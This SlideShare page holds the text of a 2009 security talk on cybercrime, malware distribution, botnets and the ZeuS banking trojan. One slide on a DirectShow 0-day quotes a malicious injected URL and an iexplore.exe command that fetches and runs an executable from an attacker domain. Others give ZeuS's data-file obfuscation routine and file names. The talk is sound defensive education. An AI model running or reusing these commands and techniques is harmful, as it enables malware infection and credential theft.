SlideShare una empresa de Scribd logo

Cibercrimen Fraude Y Malware Mikel Gastesi

Chema Alonso
Chema Alonso

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

TecnologíaNoticias y política
1 de 61
Descargar para leer sin conexión
*[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009
Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2
Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3
INTRODUCCIÓN - ¿CIBERCRIMEN? Pág. 4
¿CIBERCRIMEN?
EVOLUCIÓN (de la mentalidad)
EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos
EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad
EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!
DISTRIBUCIÓN
DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”
EJ. SPAM
EJ. SPAM
DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente
EJ. FAKE AV
EJ. FAKE AV
DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days
SQL INJECTION MASIVO
INFECCIÓN
INFECCIÓN
INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.
UNAS ESTADÍSTICAS... [secunia]
INFECCIÓN
INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus
INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx
INFECCIÓN La cadena es tan fuerte como el eslabón más débil
BOTNETS
BOTNETS
BOTNETS
BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...
BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento
TROYANOS BANCARIOS - ZeuS
TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...
TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!
ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...
ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice
ZEUS
ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits
ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS
ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines
ZEUS
ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll
ZEUS
ZEUS
ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects
ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
ZEUS - C&C
ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones
ZEUS
ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
MONEY, MONEY, MONEY
LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales
LUCRO
LUCRO
LUCRO
LUCRO
LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación
*[ MUCHAS GRACIAS ] Pág. 61

Recomendados

Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandboxTécnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Juan Salas Santillana
 
Amenazas informáticas y su posibles solución
Amenazas informáticas y su posibles solución Amenazas informáticas y su posibles solución
Amenazas informáticas y su posibles solución
1Btic
 
iOS Forensics
iOS Forensics iOS Forensics
iOS Forensics
Tjylen Veselyj
 
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Stratesys
 
Glosario de virus y fraudes
Glosario de virus y fraudesGlosario de virus y fraudes
Glosario de virus y fraudes
martinghost9999
 
Tipos de Virus informático
Tipos de Virus informáticoTipos de Virus informático
Tipos de Virus informático
luisleon123
 
Virus informaticos y fraudes.
Virus informaticos y fraudes.Virus informaticos y fraudes.
Virus informaticos y fraudes.
SprMiNeR
 
Virus y fraudes en internet
Virus y fraudes en internetVirus y fraudes en internet
Virus y fraudes en internet
aguedarubio4
 

Recomendados

Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandboxTécnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Técnicas para el desarrollo de malware funcionamiento de los antivirus y sandbox
Juan Salas Santillana
 
Amenazas informáticas y su posibles solución
Amenazas informáticas y su posibles solución Amenazas informáticas y su posibles solución
Amenazas informáticas y su posibles solución
1Btic
 
iOS Forensics
iOS Forensics iOS Forensics
iOS Forensics
Tjylen Veselyj
 
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Caso Éxito SAP & Stratesys - Penguin Random House Grupo Editorial - JUL2014
Stratesys
 
Glosario de virus y fraudes
Glosario de virus y fraudesGlosario de virus y fraudes
Glosario de virus y fraudes
martinghost9999
 
Tipos de Virus informático
Tipos de Virus informáticoTipos de Virus informático
Tipos de Virus informático
luisleon123
 
Virus informaticos y fraudes.
Virus informaticos y fraudes.Virus informaticos y fraudes.
Virus informaticos y fraudes.
SprMiNeR
 
Virus y fraudes en internet
Virus y fraudes en internetVirus y fraudes en internet
Virus y fraudes en internet
aguedarubio4
 
Virus y fraudes
Virus y fraudes Virus y fraudes
Virus y fraudes
10amr10
 
Los virus informaticos mas peligrosos
Los virus informaticos mas peligrososLos virus informaticos mas peligrosos
Los virus informaticos mas peligrosos
Jesus Garcia
 
Malware en Android: Discovering, Reversing & Forensics
Malware en Android: Discovering, Reversing & ForensicsMalware en Android: Discovering, Reversing & Forensics
Malware en Android: Discovering, Reversing & Forensics
Telefónica
 
Tipos de Virus de informaticos
Tipos de Virus de informaticosTipos de Virus de informaticos
Tipos de Virus de informaticos
Luzsiannjelys
 
Los virus informaticos
Los virus informaticosLos virus informaticos
Los virus informaticos
RJ Manayay Chavez
 
Amenazas,virus y fraudes informaticos
Amenazas,virus y fraudes informaticosAmenazas,virus y fraudes informaticos
Amenazas,virus y fraudes informaticos
REINEL FAJARDO CASAS
 
Hacking iOS: iPhone & iPad (2º Edición) [Índice]
Hacking iOS: iPhone & iPad (2º Edición) [Índice]Hacking iOS: iPhone & iPad (2º Edición) [Índice]
Hacking iOS: iPhone & iPad (2º Edición) [Índice]
Telefónica
 
El Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticosEl Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticos
guest225f3bd
 
Glosario de virus y fraudes
Glosario de virus y fraudesGlosario de virus y fraudes
Glosario de virus y fraudes
Marc Torres Ferrer
 
CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
Chema Alonso
 
Redes de computadoras e internet
Redes de computadoras e internetRedes de computadoras e internet
Redes de computadoras e internet
Ofimaticos
 
Paginas de matematicas
Paginas de matematicasPaginas de matematicas
Paginas de matematicas
espanol
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
Camilo Fernandez
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
VOIP2DAY
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
4v4t4r
 
Ccnas v11 ch01_eb
Ccnas v11 ch01_ebCcnas v11 ch01_eb
Ccnas v11 ch01_eb
Edgar Benavente
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackHack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
Marc Pàmpols
 
Tuenti - tu entidad
Tuenti - tu entidadTuenti - tu entidad
Tuenti - tu entidad
Tuenti
 
Campus party 2010 carlos castillo
Campus party 2010 carlos castilloCampus party 2010 carlos castillo
Campus party 2010 carlos castillo
campus party
 
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Jose Molina
 
Sicsti hacking
Sicsti hackingSicsti hacking
Sicsti hacking
Mackaber Witckin
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
Mauro Cruz
 

Más contenido relacionado

Destacado

Los virus informaticos mas peligrosos
Los virus informaticos mas peligrososLos virus informaticos mas peligrosos
Los virus informaticos mas peligrosos
Jesus Garcia
 
El Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticosEl Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticos
guest225f3bd
 
Paginas de matematicas
Paginas de matematicasPaginas de matematicas
Paginas de matematicas
espanol
 

Destacado (12)

Virus y fraudes
Virus y fraudes Virus y fraudes
Virus y fraudes
 
Los virus informaticos mas peligrosos
Los virus informaticos mas peligrososLos virus informaticos mas peligrosos
Los virus informaticos mas peligrosos
 
Malware en Android: Discovering, Reversing & Forensics
Malware en Android: Discovering, Reversing & ForensicsMalware en Android: Discovering, Reversing & Forensics
Malware en Android: Discovering, Reversing & Forensics
 
Tipos de Virus de informaticos
Tipos de Virus de informaticosTipos de Virus de informaticos
Tipos de Virus de informaticos
 
Los virus informaticos
Los virus informaticosLos virus informaticos
Los virus informaticos
 
Amenazas,virus y fraudes informaticos
Amenazas,virus y fraudes informaticosAmenazas,virus y fraudes informaticos
Amenazas,virus y fraudes informaticos
 
Hacking iOS: iPhone & iPad (2º Edición) [Índice]
Hacking iOS: iPhone & iPad (2º Edición) [Índice]Hacking iOS: iPhone & iPad (2º Edición) [Índice]
Hacking iOS: iPhone & iPad (2º Edición) [Índice]
 
El Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticosEl Cibercrimen y delitos informaticos
El Cibercrimen y delitos informaticos
 
Glosario de virus y fraudes
Glosario de virus y fraudesGlosario de virus y fraudes
Glosario de virus y fraudes
 
CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Redes de computadoras e internet
Redes de computadoras e internetRedes de computadoras e internet
Redes de computadoras e internet
 
Paginas de matematicas
Paginas de matematicasPaginas de matematicas
Paginas de matematicas
 

Similar a Cibercrimen Fraude Y Malware Mikel Gastesi

Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Jose Molina
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
Mauro Cruz
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
Mauro Cruz
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetJornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnet
Alejandro Ramos
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
RootedCON
 
All your data are belong to us - FIST Conference 2007
All your data are belong to us - FIST Conference 2007All your data are belong to us - FIST Conference 2007
All your data are belong to us - FIST Conference 2007
Christian Martorella
 

Similar a Cibercrimen Fraude Y Malware Mikel Gastesi (20)

Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
 
Ccnas v11 ch01_eb
Ccnas v11 ch01_ebCcnas v11 ch01_eb
Ccnas v11 ch01_eb
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackHack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Tuenti - tu entidad
Tuenti - tu entidadTuenti - tu entidad
Tuenti - tu entidad
 
Campus party 2010 carlos castillo
Campus party 2010 carlos castilloCampus party 2010 carlos castillo
Campus party 2010 carlos castillo
 
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su ...
 
Sicsti hacking
Sicsti hackingSicsti hacking
Sicsti hacking
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
Virus informáticos, tipos, prevención, conceptos
Virus informáticos, tipos, prevención, conceptosVirus informáticos, tipos, prevención, conceptos
Virus informáticos, tipos, prevención, conceptos
 
Zeus-R-uS
Zeus-R-uSZeus-R-uS
Zeus-R-uS
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetJornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnet
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
 
Ataquesyvulnerabilidad
AtaquesyvulnerabilidadAtaquesyvulnerabilidad
Ataquesyvulnerabilidad
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umh
 
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
 
All your data are belong to us - FIST Conference 2007
All your data are belong to us - FIST Conference 2007All your data are belong to us - FIST Conference 2007
All your data are belong to us - FIST Conference 2007
 
Semana de la I+D - Proyecto OPOSSUM
Semana de la I+D - Proyecto OPOSSUMSemana de la I+D - Proyecto OPOSSUM
Semana de la I+D - Proyecto OPOSSUM
 

Más de Chema Alonso

CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 

Más de Chema Alonso (20)

Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 
Codemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityCodemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & Humility
 

Último

Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
AnnimoUno1
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
LolaBunny11
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
FagnerLisboa3
 

Último (15)

Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdfRefrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptxEL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
 
presentacion de PowerPoint de la fuente de poder.pptx
presentacion de PowerPoint de la fuente de poder.pptxpresentacion de PowerPoint de la fuente de poder.pptx
presentacion de PowerPoint de la fuente de poder.pptx
 
Presentación de elementos de afilado con esmeril
Presentación de elementos de afilado con esmerilPresentación de elementos de afilado con esmeril
Presentación de elementos de afilado con esmeril
 

Cibercrimen Fraude Y Malware Mikel Gastesi

  • 1. *[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009
  • 2. Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2
  • 3. Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3
  • 6. EVOLUCIÓN (de la mentalidad)
  • 7. EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos
  • 8. EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad
  • 9. EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!
  • 11. DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”
  • 14. DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente
  • 17. DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days
  • 21. INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.
  • 24. INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus
  • 25. INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx
  • 26. INFECCIÓN La cadena es tan fuerte como el eslabón más débil
  • 30. BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...
  • 31. BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento
  • 33. TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...
  • 34. TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!
  • 35. ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...
